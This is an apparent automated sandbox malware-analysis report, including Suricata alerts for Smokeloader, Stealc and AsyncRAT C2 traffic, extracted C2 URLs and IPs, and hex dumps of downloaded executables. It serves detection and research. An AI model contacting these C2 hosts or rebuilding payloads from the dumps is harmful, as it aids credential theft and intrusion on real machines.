Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.29.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.29.dr, msvcp140[1].dll.29.dr
Source:	Binary string: RegAsm.pdb4 source: RegAsm.exe, 0000001F.00000000.3039162333.0000000000272000.00000002.00000001.01000000.00000010.sdmp, RegAsm.exe.17.dr
Source:	Binary string: nss3.pdb source: svchost015.exe, 0000001D.00000002.2679610884.000000006CA6F000.00000002.00000001.01000000.0000000E.sdmp, nss3.dll.29.dr, nss3[1].dll.29.dr
Source:	Binary string: mozglue.pdb source: svchost015.exe, 0000001D.00000002.2675141656.000000006C8AD000.00000002.00000001.01000000.0000000F.sdmp, mozglue[1].dll.29.dr, mozglue.dll.29.dr
Source:	Binary string: softokn3.pdb source: softokn3.dll.29.dr

Source: C:\Users\user\AppData\Local\Temp\329C.exe	Code function: 7_2_004062EB FindFirstFileW,FindClose,	7_2_004062EB
Source: C:\Users\user\AppData\Local\Temp\329C.exe	Code function: 7_2_00406CB1 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	7_2_00406CB1
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00E84005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	25_2_00E84005
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00E8C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	25_2_00E8C2FF
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00E8494A GetFileAttributesW,FindFirstFileW,FindClose,	25_2_00E8494A
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00E8CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	25_2_00E8CD9F
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00E8CD14 FindFirstFileW,FindClose,	25_2_00E8CD14
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00E8F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	25_2_00E8F5D8
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00E8F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	25_2_00E8F735
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00E8FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	25_2_00E8FA36
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00E83CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	25_2_00E83CE2

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\795933\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\795933	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:56147 -> 191.191.224.16:80
Source: Network traffic	Suricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.4:56147 -> 191.191.224.16:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:56151 -> 191.191.224.16:80
Source: Network traffic	Suricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.4:56151 -> 191.191.224.16:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:56155 -> 191.191.224.16:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:56153 -> 191.191.224.16:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:56149 -> 191.191.224.16:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:56142 -> 191.191.224.16:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:56150 -> 191.191.224.16:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:56158 -> 191.191.224.16:80
Source: Network traffic	Suricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.4:56158 -> 191.191.224.16:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:56146 -> 191.191.224.16:80
Source: Network traffic	Suricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.4:56146 -> 191.191.224.16:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:56144 -> 191.191.224.16:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:56145 -> 191.191.224.16:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:56152 -> 191.191.224.16:80
Source: Network traffic	Suricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.4:56152 -> 191.191.224.16:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:56156 -> 191.191.224.16:80
Source: Network traffic	Suricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.4:56144 -> 191.191.224.16:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:56159 -> 191.191.224.16:80
Source: Network traffic	Suricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.4:56159 -> 191.191.224.16:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:56157 -> 191.191.224.16:80
Source: Network traffic	Suricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.4:56145 -> 191.191.224.16:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:56143 -> 191.191.224.16:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:56148 -> 191.191.224.16:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:56154 -> 191.191.224.16:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:56161 -> 191.191.224.16:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:56164 -> 191.191.224.16:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:56162 -> 191.191.224.16:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:56167 -> 191.191.224.16:80
Source: Network traffic	Suricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.4:56167 -> 191.191.224.16:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:56165 -> 191.191.224.16:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:56166 -> 191.191.224.16:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:56168 -> 191.191.224.16:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:56170 -> 191.191.224.16:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:56172 -> 191.191.224.16:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:56173 -> 191.191.224.16:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:56174 -> 191.191.224.16:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:56176 -> 191.191.224.16:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:56175 -> 191.191.224.16:80
Source: Network traffic	Suricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.4:56175 -> 191.191.224.16:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:56177 -> 91.202.233.158:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:56177 -> 91.202.233.158:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 91.202.233.158:80 -> 192.168.2.4:56177
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:56177 -> 91.202.233.158:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 91.202.233.158:80 -> 192.168.2.4:56177
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:56177 -> 91.202.233.158:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:56178 -> 191.191.224.16:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:56179 -> 191.191.224.16:80
Source: Network traffic	Suricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.4:56179 -> 191.191.224.16:80
Source: Network traffic	Suricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 45.202.35.38:56001 -> 192.168.2.4:56180
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:56181 -> 191.191.224.16:80
Source: Network traffic	Suricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.4:56181 -> 191.191.224.16:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:56182 -> 191.191.224.16:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:56184 -> 92.36.226.66:80
Source: Network traffic	Suricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.4:56184 -> 92.36.226.66:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:56185 -> 92.36.226.66:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:56183 -> 191.191.224.16:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:56187 -> 92.36.226.66:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:56186 -> 92.36.226.66:80
Source: Network traffic	Suricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.4:56187 -> 92.36.226.66:80
Source: Network traffic	Suricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.4:56186 -> 92.36.226.66:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:56192 -> 92.36.226.66:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:56193 -> 92.36.226.66:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:56189 -> 92.36.226.66:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:56188 -> 92.36.226.66:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:56191 -> 92.36.226.66:80
Source: Network traffic	Suricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.4:56191 -> 92.36.226.66:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:56190 -> 92.36.226.66:80
Source: Network traffic	Suricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.4:56190 -> 92.36.226.66:80
Source: Network traffic	Suricata IDS: 2044249 - Severity 1 - ET MALWARE Win32/Stealc Submitting Screenshot to C2 : 192.168.2.4:56177 -> 91.202.233.158:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 94.228.169.44 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 191.191.224.16 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 92.36.226.66 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 84.32.84.144 443	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://91.202.233.158/e96ea2db21fa9a1b.php
Source: Malware configuration extractor	URLs: http://91.202.233.158/e96ea2db21fa9a1b.php
Source: Malware configuration extractor	URLs: http://epohe.ru/tmp/
Source: Malware configuration extractor	URLs: http://olihonols.in.net/tmp/
Source: Malware configuration extractor	URLs: http://nicetolosv.xyz/tmp/
Source: Malware configuration extractor	URLs: http://jftolsa.ws/tmp/

Source: global traffic

TCP traffic: 192.168.2.4:56180 -> 45.202.35.38:56001

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 01 Sep 2024 16:27:45 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sat, 31 Aug 2024 18:50:16 GMTETag: "1ba703-620ff2db74a00"Accept-Ranges: bytesContent-Length: 1812227Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 61 4b 5a 65 25 2a 34 36 25 2a 34 36 25 2a 34 36 2c 52 b7 36 26 2a 34 36 2c 52 a7 36 34 2a 34 36 25 2a 35 36 89 2a 34 36 3e b7 9e 36 2b 2a 34 36 3e b7 ae 36 24 2a 34 36 3e b7 a9 36 24 2a 34 36 52 69 63 68 25 2a 34 36 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 cf e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 70 00 00 00 94 3e 00 00 42 00 00 99 38 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 d0 4b 00 00 04 00 00 06 6b 1c 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 9b 00 00 b4 00 00 00 00 30 47 00 06 5b 04 00 00 00 00 00 00 00 00 00 ab 7e 1b 00 58 28 00 00 00 90 3f 00 48 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1c 6f 00 00 00 10 00 00 00 70 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 62 2a 00 00 00 80 00 00 00 2c 00 00 00 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 dc 66 3e 00 00 b0 00 00 00 02 00 00 00 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 08 00 00 20 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 06 5b 04 00 00 30 47 00 00 5c 04 00 00 a2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0e 32 00 00 00 90 4b 00 00 34 00 00 00 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 01 Sep 2024 16:28:13 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 01 Sep 2024 16:28:18 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
